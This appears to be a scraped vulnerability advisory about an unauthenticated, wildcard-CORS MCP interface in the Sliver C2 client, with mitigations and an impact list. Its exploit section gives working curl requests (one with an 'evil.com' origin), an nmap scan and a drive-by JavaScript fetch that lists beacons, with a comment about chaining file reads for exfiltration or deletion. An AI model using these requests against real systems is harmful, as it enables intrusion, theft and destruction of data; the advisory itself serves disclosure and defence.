Listen to this Post
The vulnerability exists because the Sliver MCP server, which runs inside the Sliver client, binds an unauthenticated HTTP and SSE interface to `localhost:8080` by default and returns `Access-Control-Allow-Origin: ` on all responses. This permissive CORS header allows any arbitrary website to issue cross-origin requests to the interface through an operator’s browser, with no credentials or preflight required. The issue is exacerbated because the underlying `mcp-go` library hardcodes the wildcard CORS header and fails to validate Content-Type, allowing simple requests (e.g., text/plain) to bypass the OPTIONS preflight entirely. An attacker can therefore lure an operator to a malicious page that executes JavaScript silently interacting with the local MCP API. The exposed methods include list_sessions_and_beacons, filesystem operations (fs_ls, fs_cat, fs_rm, etc.), giving full control over active beacons and sessions. If the interface is misconfigured to bind to 0.0.0.0, the attack escalates to direct unauthenticated remote access from any network actor. No authentication middleware or origin restrictions are implemented in Sliver, making the RPC endpoint completely unprotected. A single click can lead to total operational compromise: data exfiltration, campaign destruction, or infrastructure takeover.
DailyCVE Form
Platform: Sliver C2
Version: All MCP-enabled
Vulnerability: Unauthenticated MCP Interface
Severity: Critical
Date: 2026-03-31
Prediction: April 2026 estimated
What Undercode Say:
Analytics from the
Check if MCP interface is exposed on localhost
curl -H "Origin: http://evil.com" http://localhost:8080/mcp
List active beacons (simple request example)
curl -X POST http://localhost:8080/mcp \
-H "Content-Type: text/plain" \
-d '{"jsonrpc":"2.0","method":"tools/call","params":{"name":"list_sessions_and_beacons"}}'
For 0.0.0.0 misconfiguration, scan network for port 8080
nmap -p 8080 <target-C2-IP> --open
Exploit:
Attacker-controlled JavaScript (drive-by):
// Executes without preflight due to text/plain
fetch('http://localhost:8080/mcp', {
method: 'POST',
headers: { 'Content-Type': 'text/plain' },
body: JSON.stringify({
jsonrpc: '2.0',
method: 'tools/call',
params: { name: 'list_sessions_and_beacons' }
})
}).then(r => r.json()).then(console.log);
// Then chain fs_cat to exfiltrate data or fs_rm to destroy beacons
Protection from this CVE
- Bind only to loopback and restrict with firewall rules.
- Never bind to `0.0.0.0` for this interface.
- Apply vendor patch when available; until then, disable MCP server if not needed.
- Use browser isolation or strict network policies for operator workstations.
- Implement authentication proxy in front of the MCP endpoint.
Impact
Total operational compromise:
- Complete visibility into active beacons and sessions.
- Arbitrary file read (SSH keys, ntds.dit) via existing C2 channels.
- Integrity loss: delete or modify files on compromised targets.
- If bound to
0.0.0.0, direct remote takeover of the entire C2 infrastructure without operator interaction.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

